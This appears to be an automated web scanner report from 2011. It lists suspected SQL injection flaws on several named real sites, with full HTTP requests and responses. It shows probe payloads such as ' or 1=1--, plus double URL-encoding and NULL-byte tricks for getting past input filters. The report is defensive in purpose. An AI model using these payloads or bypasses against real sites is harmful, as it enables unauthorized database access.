SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /2011'/01/05/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /blog'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:12:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761978+173.193.214.243; path=/ Vary: Cookie X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php Content-Length: 72723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /category/bad-behavior'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:14:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762060+173.193.214.243; path=/ Vary: Cookie X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php Content-Length: 51665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://bad-behavior.ioerror.us
Path:
/category/bad-behavior/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /category/bad-behavior/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762019+173.193.214.243; path=/ Vary: Cookie X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php Content-Length: 51670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://bad-behavior.ioerror.us
Path:
/feed/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:36 GMT Content-Type: text/xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761895+173.193.214.243; path=/ Vary: Cookie X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188a04458920669c" Content-Length: 41692
<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elem ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://bad-behavior.ioerror.us
Path:
/feed/atom/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/atom/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932+173.193.214.243;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:42 GMT Content-Type: application/atom+xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761902+173.193.214.243; path=/ Vary: Cookie X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188a04458920669c" Content-Length: 45367
<?xml version="1.0" encoding="UTF-8"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en" xml:base="http://bad-behavior.ioerror.us/wp-ato ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 20435182'%20or%201%3d1--%20 and 20435182'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com Content-Length: 2003 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript
var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.trafficshaping.com/_mint/?record&key=384148426b333545573532697a435238386b393231'; path = path.replace(/^https?:/, window.location.protocol);
// Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin].onsave) { path += this[developer][plugin].onsave(); }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime();
// Redirect to the debug page if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:19 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com Content-Length: 2015 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript
var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.trafficshaping.com/_mint/?record&key=4455513933353556785a75734b5367744a32383868616979393231'; path = path.replace(/^https?:/, window.location.protocol);
// Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin].onsave) { path += this[developer][plugin].onsave(); }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime();
// Redirect to the debug page if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.thedetroitbureau.com/about-us/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:54 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10985
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.thedetroitbureau.com/about-us/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:55 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 11041
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]...
The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.thedetroitbureau.com/about-us/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:52 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.thedetroitbureau.com/about-us/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:53 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 14565
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]...
The file parameter appears to be vulnerable to SQL injection attacks. The payloads 80562684'%20or%201%3d1--%20 and 80562684'%20or%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com/skin/slick-redux/222084 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1835 Cache-Control: public, max-age=30 Expires: Sun, 27 Feb 2011 17:46:13 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding
<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect (Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooks ...[SNIP]...
Request 2
GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d2--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com/skin/slick-redux/222084 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT Content-Type: text/plain Cache-Control: public, max-age=2592000 Expires: Tue, 29 Mar 2011 17:45:43 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding Content-Length: 15821
The MintUnique cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the MintUnique cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d1--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200
Response 1
